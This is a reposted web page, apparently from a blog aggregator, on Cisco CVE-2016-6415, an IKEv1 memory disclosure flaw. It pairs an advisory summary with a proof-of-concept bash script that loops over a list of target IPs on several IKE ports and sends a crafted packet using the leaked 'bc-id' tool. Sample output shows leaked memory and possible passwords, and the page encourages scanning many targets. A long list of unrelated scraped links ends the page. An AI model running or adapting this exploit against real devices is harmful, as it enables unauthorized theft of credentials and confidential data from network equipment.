Vuln - Cisco - CVE-2016-6415 - IKE Information Disclosure
来源:互联网 发布:战狼2影评知乎 编辑:程序博客网 时间:2024/05/16 07:28
Summary
A vulnerability in Internet Key Exchange version 1 (IKEv1) packet processing code in Cisco IOS, Cisco IOS XE, and Cisco IOS XR Software could allow an unauthenticated, remote attacker to retrieve memory contents, which could lead to the disclosure of confidential information.The vulnerability is due to insufficient condition checks in the part of the code that handles IKEv1 security negotiation requests. An attacker could exploit this vulnerability by sending a crafted IKEv1 packet to an affected device configured to accept IKEv1 security negotiation requests. A successful exploit could allow the attacker to retrieve memory contents, which could lead to the disclosure of confidential information.
Cisco will release software updates that address this vulnerability. There are no workarounds that address this vulnerability.
This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1
Poc
# [+] ---- Fingerprint: ---- [+]# cisco pix# cisco pix 6# cisco pix 7## 500/udp open isakmp udp-response Cisco VPN Concentrator 3000 4.0.7# Cisco Systems, Inc./VPN 3000 Concentrator Version 4.7.2.L built by vmurphy on Jun 11 2007 14:07:29# Vendor: Cisco Systems, Inc.# Cisco Systems, Inc. 12.2# Cisco Systems, Inc. 12.4# Cisco Systems, Inc. 15.5# Cisco Systems pix# Cisco VPN Concentratorfunction exploit{if [ -z "$1" ]; then echo "[*] please set a valid ip, ex: 8.8.8.8"; exit 0;fiif [ -z "$2" ]; then echo "[*] please set a valid port, ex: 500, 4500"fiip="$1"port="$2"echo -e "[*] sending [$payload] -> $ip: $port"timeout 6s ./bc-id -t $ip -p $port -I "sendpacket.raw"}# UDP port 500# UDP port 4500, NAT Traversal (NAT-T)# UDP port 848, Group Domain of Interpretation (GDOI)# UDP port 4848, GDOI NAT-Tfunction main{ echo "1) exploit port 500"; echo "2) exploit port 4500"; echo "3) exploit port 848"; echo "4) exploit port 4848"; read -p "[*] please make a choice: " choice read -p "[*] please set a valid iplist: " iplist for ip in $(cat $iplist); do case $choice in 1) exploit $ip 500;; 2) exploit $ip 4500;; 3) exploit $ip 848;; 4) exploit $ip 4848;; esac done}main
If you exploit the target successfully, information is as follow:
Connection established.Opening input file sendpacket.raw....Sending packet to 192.168.1.2....Waiting for a response from 192.168.1.2....Writing response to 192.168.1.2.raw....Writing response to 192.168.1.2.hex....Packet recieved: 3e 35 c7 07 29 df ed ef 8e 35 0e 85 0e c6 7f a3 >5..)....5...... .... .... 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 ............ Total bytes printed = 2540Parsing response.... Value found is: 0x441e2300 Version matches: None. Unknown value. Possible passwords: <<<< <<<<1 <<<< <<<< abcde1 abcde1 tQQwQQdp
Scan Targets
If you want to scan multi targets, please try Packet Structure with your program:
1. IP/UDP/ISAKMP2. ISAKMP == sendpacket.raw
Download sendpacket.raw
References
- https://github.com/adamcaudill/EquationGroupLeak/tree/master/Firewall/TOOLS/BenignCertain/benigncertain-v1110
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1
- https://tools.cisco.com/security/center/selectIOSVersion.x
- https://isakmpscan.shadowserver.org/
- http://www.freebuf.com/vuls/115207.html
- http://www.freebuf.com/news/115118.html
- https://twitter.com/marcan42/status/766346343405060096
- https://nmap.org/nsedoc/scripts/ike-version.html
- http://www.cisco.com/c/en/us/about/security-center/identify-mitigate-exploit-ikev1-info-disclosure-vuln.html
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6415
- https://github.com/rapid7/metasploit-framework/issues/7371
- Vuln - Cisco - CVE-2016-6415 - IKE Information Disclosure
- Vuln - Cisco - CVE-2016-6366
- Vuln: IBM AIX FTP Server 'NLST' Command Information Disclosure Vulnerability
- PHPMailer Exploit Remote Code Exec CVE-2016-10033 Vuln
- Apache Tomcat information disclosure vulnerability
- CISCO 零日漏洞 CVE-2016-6415,由NSA方程组泄露档案中探得
- CISCO 零日漏洞 CVE-2016-6415,由NSA方程组泄露档案中探得
- Lighttpd URI Rewrite/Redirect Information Disclosure Vulnerability
- Reducing Information Disclosure in WCF Data Services
- Apache suEXEC Privilege Elevation / Information Disclosure
- Apache suEXEC Privilege Elevation / Information Disclosure
- IKE
- IKE
- OpenSSL TLS Heartbeat Extension - Memory Disclosure(exploit)--CVE: 2014-0160
- Samba setuid 'mount.cifs' Verbose Option Information Disclosure Vulnerability
- Linux Kernel 'kernel/signal.c' Local Information Disclosure Vulnerability
- LiteSpeed Web Server Source Code Information Disclosure Vulnerability
- Linux Kernel 'mpt2sas' Local Privilege Escalation and Information Disclosure Vulnerabilitie
- 高端内存映射之kmap_atomic固定映射--Linux内存管理(二十一)
- 7 建立报表鼠标点击处高亮显示
- ASP.NET文档管理系统源码(功能强大且实用)
- 关于四个常用数据类型的介绍
- 低潮
- Vuln - Cisco - CVE-2016-6415 - IKE Information Disclosure
- Java程序的运行过程
- 深拷贝与浅拷贝的认识
- c语言—语句
- 详细具体的竞标流程
- java环境搭建系列:JDK环境变量详细配置
- SDUTACM 数据结构实验之链表六:有序链表的建立
- CODEVS 2491 玉蟾宫 (单调栈或者dp乱搞什么的)
- 四大组件之一:Activity